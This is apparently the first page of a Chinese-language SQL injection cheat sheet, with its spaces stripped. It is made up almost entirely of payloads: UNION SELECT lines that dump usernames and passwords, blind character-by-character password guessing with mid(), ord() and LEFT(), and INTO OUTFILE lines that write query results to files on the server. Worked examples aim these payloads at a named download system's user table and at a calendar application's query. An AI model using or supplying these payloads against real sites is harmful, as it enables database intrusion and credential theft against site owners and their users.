'%23

'andpassWord='mypass

id=-1unionselect1,1,1

id=-1unionselectchar(97),char(97),char(97)

id=1unionselect1,1,1frommembers

id=1unionselect1,1,1fromadmin

id=1unionselect1,1,1fromuser

userid=1andpassword=mypass

userid=1andmid(password,3,1)=char(112)

userid=1andmid(password,4,1)=char(97)

andord(mid(password,3,1))>111（ord函数很好用，可以返回整形的）

'andLENGTH(password)='6（探测密码长度）

'andLEFT(password,1)='m

'andLEFT(password,2)='my

…………………………依次类推

'unionselect1,username,passwordfromuser/*

'unionselect1,username,passwordfromuser/*

='unionselect1,username,passwordfromuser/*（可以是1或者=后直接跟）

99999'unionselect1,username,passwordfromuser/*

'intooutfile'c:/file.txt（导出文件）

='or1=1intooutfile'c:/file.txt

1'unionselect1,username,passwordfromuserintooutfile'c:/user.txt

selectpasswordFROMadminswherelogin='John'INTODUMPFILE'/path/to/site/file.txt'

id='unionselect1,username,passwordfromuserintooutfile

id=-1unionselect1,database(),version()（灵活应用查询）

常用查询测试语句，

select*FROMtablewhere1=1

select*FROMtablewhere'uuu'='uuu'

select*FROMtablewhere1<>2

select*FROMtablewhere3>2

select*FROMtablewhere2<3

select*FROMtablewhere1

select*FROMtablewhere1+1

select*FROMtablewhere1--1

select*FROMtablewhereISNULL(NULL)

select*FROMtablewhereISNULL(COT(0))

select*FROMtablewhere1ISNOTNULL

select*FROMtablewhereNULLISNULL

select*FROMtablewhere2BETWEEN1AND3

select*FROMtablewhere'b'BETWEEN'a'AND'c'

select*FROMtablewhere2IN(0,1,2)

select*FROMtablewhereCASEWHEN1>0THEN1END

例如：夜猫下载系统1.0版本

id=1unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_user

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1

id=10000unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andgroupid=1

unionselect1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1（替换，寻找密码）

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,1,1))=49（验证第一位密码）

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,2,1))=50（第二位）

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,3,1))=51

…………………………………………………………

例如2：灰色轨迹变换id进行测试（meteor）

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate

当前1/2页12下一页阅读全文